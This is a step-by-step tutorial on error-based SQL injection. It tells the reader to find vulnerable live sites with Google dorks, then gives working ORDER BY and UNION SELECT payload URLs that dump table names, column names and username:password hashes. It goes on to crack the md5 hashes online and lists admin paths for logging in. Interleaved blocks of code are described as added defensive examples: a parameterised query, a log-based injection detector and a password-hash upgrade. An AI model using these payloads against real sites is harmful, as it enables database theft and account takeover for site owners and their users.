Error Based SQL Injection

  • Error based SQL injection takes advantage of poor error handling in web page processing. This tutorial has been made as simple as possible so that it is easy to follow.

    For this attack there are usually 5 major steps to compromise an application, but this may vary depending on the application's workflow:

    • Finding the target
    • Identifying database size i.e. number of columns
    • Extracting database tables
    • Extracting database columns in target tables e.g. user table
    • Extracting data from database columns e.g. user account details
    • Cracking passwords of user accounts.

    Before we proceed it is important to cover some basic SQL concepts, so that one can judge the success or failure of the attack depending on the server and application configuration.

    1. Union types: there are 2 types, i.e. UNION and UNION ALL
    2. Concat operators (whitespace substitutes): these could be + , /**/, space, %09, %0a, %0D
    3. Comment markers: these could be --, /*, ##
    4. group_concat: used to request several values and display them within a single field, e.g. group_concat(table_name), group_concat(column_name), group_concat(schema_name)

    1. Finding The Target

    To find a target on Google you use "google dorks", i.e. search terms that sieve out an architecture likely to have this vulnerability. Below are a few examples:

    • allinurl:index.php?id=
    • allinurl:trainers.php?id=
    • allinurl:buy.php?category=

    Now from the results just open the links in a new tab and add an apostrophe (') after the URL. A vulnerable target will respond with something like:

    "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1 ' at line 1"

    Note:
    You could also test for the error by appending a single quote ' (without the surrounding quotes) to the URL, or a double quote ", etc.
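    The error message above only helps an attacker because the application splices the id parameter straight into its SQL and echoes the database driver's error back to the page. The following is an added example, not code from this tutorial: the vulnerable pattern beside a hardened version that validates the id, binds it as a parameter and returns only a generic error. SQLite stands in for MySQL so it runs offline, and the items table is a constructed stand-in for the shop's product table.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the shop's product table (SQLite instead of MySQL).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER, name TEXT, descr TEXT, price REAL)")
    conn.execute("INSERT INTO items VALUES (23, 'Widget', 'A small widget', 9.99)")
    return conn

def lookup_vulnerable(conn, item_id):
    # The weakness the tutorial relies on: the raw query-string value is spliced
    # into the SQL text, and the driver's error message is handed back to the user.
    sql = f"SELECT id, name, descr, price FROM items WHERE id = {item_id}"
    try:
        return {"rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        return {"rows": [], "error": str(exc)}  # leaks DB internals to the page

def lookup_hardened(conn, item_id):
    # 1) strict type check: "23'" or "23 order by 5--" never reach the database
    # 2) the value travels as a bound parameter, never as SQL text
    # 3) database errors are logged server-side and replaced by a generic message
    try:
        num = int(item_id)
    except (TypeError, ValueError):
        return {"rows": [], "error": "invalid id"}
    sql = "SELECT id, name, descr, price FROM items WHERE id = ?"
    try:
        return {"rows": conn.execute(sql, (num,)).fetchall(), "error": None}
    except sqlite3.Error:
        # a real application would call logging.exception(...) here
        return {"rows": [], "error": "item lookup failed"}

if __name__ == "__main__":
    db = make_db()
    for probe in ("23", "23'", "23 order by 5--"):
        print(repr(probe), "->", lookup_vulnerable(db, probe)["error"],
              "|", lookup_hardened(db, probe)["error"])
```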

    2. Identifying the Database

    For this stage we will use a few SQL commands. The target, for explanatory purposes, is:

    http://www.alien.target/browse-items.php?id=23

    The first step is to identify the number of columns in the table that holds the information on the current page. To do this we use the ORDER BY clause with increasing column numbers until we get an error; the number of columns is then one less than the first value that errors.

    • http://www.alien.target/browse-items.php?id=23 order by 1-- (no error)
    • http://www.alien.target/browse-items.php?id=23 order by 2-- (no error)
    • http://www.alien.target/browse-items.php?id=23 order by 3-- (no error)
    • http://www.alien.target/browse-items.php?id=23 order by 4-- (no error)
    • http://www.alien.target/browse-items.php?id=23 order by 5-- (error)

    The error reads:
    Unknown column '5' in 'order clause'

    The table therefore has four columns.

    The next step is finding string columns (columns we can use to extract information via various read and write operations through SQL queries). To do this we use a negative sign (-) on the id together with a UNION SELECT statement.

    For illustration purposes the constructed URL would be:

    http://www.alien.target/browse-items.php?id=-23 union select 1,2,3,4--

    Notice the - before 23. It is crucial because we are forcing errors, and this is the easiest way to get one, as there is no negative index in the DB.

    In this illustration the number "3" appeared on the page (the number is usually in bold and always looks out of place). This means column 3 can be used to display the information we want. As a test, let's get the MySQL database version by replacing the number 3 with @@version:

    http://www.alien.target/browse-items.php?id=-23 union select 1,2,@@version,4--


    And voilà, the MySQL version is displayed.

    The next stage is where the data exfiltration starts. The key thing to understand for the next queries is the structure of information_schema. We focus on this database because it has a definite, predictable structure and it contains metadata (data about data). If you are unfamiliar with it, you can install LAMP or XAMPP locally and browse it via phpMyAdmin to learn its components.

    3. Extracting Database Tables

    Extracting the database tables involves concat statements. Since we now want the table names, we use group_concat(table_name) to pull them from information_schema. The URL looks like this:

    http://www.alien.target/browse-items.php?id=-23 union select 1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--

    Notice that group_concat(table_name) takes the place of the number 3, as that is the column we can put our SQL expressions in. What follows after 4 is the FROM/WHERE part of the query: it reads information_schema.tables and keeps only the tables belonging to the current database (table_schema=database()).

    In this illustration the webpage lists the following tables:
    "tbl_cart,tbl_cartitems,tbl_cartstatus,tbl_categories,tbl_clientdetails,tbl_countries,tbl_deliverymethods,tbl_feedbacks,tbl_inventory,tbl_orders,tbl_orderstatus,tbl_paymentmethods,tbl_payments,tbl_paymentstatus,tbl_permits,tbl_products,tbl_productstatus,tbl_statistics,tbl_sysusers,tbl_tagitems,tbl_tags,tbl_usergroups,tbl_users,tbl_userstatus"

    4. Extracting Database Columns

    You could extract the columns of every table, but the quicker way to full rights is to go straight for the kill: deal only with the table that handles authentication, which in this case is tbl_users.

    As a precaution the attacker can hide the table name, by encoding it in hexadecimal, when requesting its columns. To create hexadecimal equivalents you can use a tool like the mth3l3m3nt framework's payload encoder (Hex with 0x Prefix option).

    The value of tbl_users in that format is 0x74626c5f7573657273. The 0x prefix denotes that the value is a hexadecimal literal, not a quoted string. To extract the column names via the injection we use group_concat(column_name) and, instead of reading information_schema.tables for a schema, we read information_schema.columns where table_name is our target table, in this case tbl_users. So the URL is going to be:

    http://www.alien.target/browse-items.php?id=-23 union select 1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x74626c5f7573657273--

    The result in this illustration is:

    "UserId,Username,Password,GroupId,ActivationCode,StatusId"

    5. Extracting Data From Database Columns

    The last step is extracting the relevant data from the table. Since we know the fields we can pick only what we need, in our case the username and password. When extracting specific data we use 0x3a (the hexadecimal representation of a colon) as a separator and group_concat(0x3a,fieldname) as the method:

    http://www.alien.target/browse-items.php?id=-23 union select 1,2,group_concat(Username,0x3a,Password),4+from+tbl_users--


    When we run the command we get a result similar to the one below:

    admin:2f103e6dc3675126bebf2386153b635b
    someuser@alien.target:96e79218965eb72c92a549dd5a330112
    someotherguy@alien.target:7b9782f47963eb16a2003636f9be9969
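    Every probe used in steps 2 to 5 (the apostrophe test, ORDER BY counting, UNION SELECT, information_schema reads, group_concat and 0x hex literals) is visible in the web server's access log. The following is an added example, not part of the tutorial, that URL-decodes the query string of each log line and names the techniques it matches; the log lines are constructed in combined format to mirror the requests against browse-items.php shown above.

```python
import re
from urllib.parse import unquote_plus

# One regex per technique the tutorial walks through, applied to the decoded query string.
SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "version_probe": re.compile(r"@@version", re.I),
    "hex_literal": re.compile(r"=\s*0x[0-9a-f]{4,}", re.I),  # e.g. table_name=0x7462...
    "trailing_comment": re.compile(r"(?:--|#|/\*)\s*$"),
    "quote_probe": re.compile(r"=\s*-?\d*['\"]\s*$"),        # the apostrophe test
}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def query_string(log_line):
    """Return the URL-decoded query string of a combined-format access log line."""
    m = REQUEST_RE.search(log_line)
    if not m or "?" not in m.group(1):
        return ""
    # unquote_plus turns 'union+select' and '%27' back into the SQL the server saw
    return unquote_plus(m.group(1).split("?", 1)[1])

def classify(log_line):
    """Names of the signatures that fire on this line, sorted for stable output."""
    qs = query_string(log_line)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(qs))

LOG_SAMPLE = [  # constructed lines mirroring the tutorial's probes against browse-items.php
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /browse-items.php?id=23 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /browse-items.php?id=23%27 HTTP/1.1" 500 128',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /browse-items.php?id=23+order+by+5-- HTTP/1.1" 500 128',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /browse-items.php?id=-23+union+select+1,2,'
    'group_concat(column_name),4+from+information_schema.columns+where+table_name=0x74626c5f7573657273-- HTTP/1.1" 200 640',
]

def suspicious_lines(lines=LOG_SAMPLE):
    """(line, hits) for every line that triggers at least one signature."""
    flagged = []
    for line in lines:
        hits = classify(line)
        if hits:
            flagged.append((line, hits))
    return flagged

if __name__ == "__main__":
    for line, hits in suspicious_lines():
        print(", ".join(hits), "<-", query_string(line))
```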

    But I only need admin, so now to get the password in plain English.

    6. Cracking Passwords

    The hash shown is a simple PHP md5 password hash, so let's crack it using an online service; this is faster than the offline method, but if you want to you could crack them offline. If so you can use:

    • Hashcat
    • John the ripper

    But I use an online service: https://hashkiller.io/


    Paste the hash, verify you are not a bot and click "decrypt hashes". Below are the above hashes cracked:

    admin:2f103e6dc3675126bebf2386153b635b:RHINO81
    someuser@alien.target:96e79218965eb72c92a549dd5a330112:111111
    someotherguy@alien.target:7b9782f47963eb16a2003636f9be9969:coastalalien
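    The hashes above fall to a lookup service instantly because they are unsalted md5 values. As an added example, not from the tutorial, the code below recognises such a legacy value in a stored password field, verifies it once, and replaces it with a salted PBKDF2 hash on the next successful login; the "pbkdf2_sha256$iterations$salt$hash" storage format is this example's own convention.

```python
import hashlib
import hmac
import os
import re

LEGACY_MD5 = re.compile(r"^[0-9a-f]{32}$", re.I)  # an unsalted md5 hex digest
ITERATIONS = 600_000

def legacy_md5(password):
    # How the tutorial's tbl_users hashes were produced: md5(password), no salt.
    return hashlib.md5(password.encode()).hexdigest()

def is_legacy_md5(stored):
    return bool(LEGACY_MD5.match(stored))

def hash_password(password, salt=None, iterations=ITERATIONS):
    # Random per-user salt defeats precomputed lookup tables; the iteration count
    # makes each guess expensive for an attacker who has dumped the table.
    salt = salt or os.urandom(16).hex()
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return f"pbkdf2_sha256${iterations}${salt}${dk.hex()}"

def check_pbkdf2(stored, password):
    try:
        algo, iters, salt, digest = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        expected = hash_password(password, salt, int(iters)).split("$")[3]
    except ValueError:  # malformed record or non-numeric iteration count
        return False
    return hmac.compare_digest(expected, digest)

def verify_and_upgrade(stored, password):
    """Return (ok, replacement): replacement is the new hash to store, or None."""
    if is_legacy_md5(stored):
        ok = hmac.compare_digest(legacy_md5(password), stored.lower())
        # Upgrade the record the first time the legacy hash verifies.
        return ok, (hash_password(password) if ok else None)
    return check_pbkdf2(stored, password), None

if __name__ == "__main__":
    old = legacy_md5("111111")  # constructed legacy record
    ok, new = verify_and_upgrade(old, "111111")
    print(ok, new[:30] + "...")
```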

    Lastly you would need to find the admin area and test the credentials; some common examples are below:

    1. /cp
    2. /admin
    3. /cms
    4. /administrator
    5. /admin.php
    6. /owner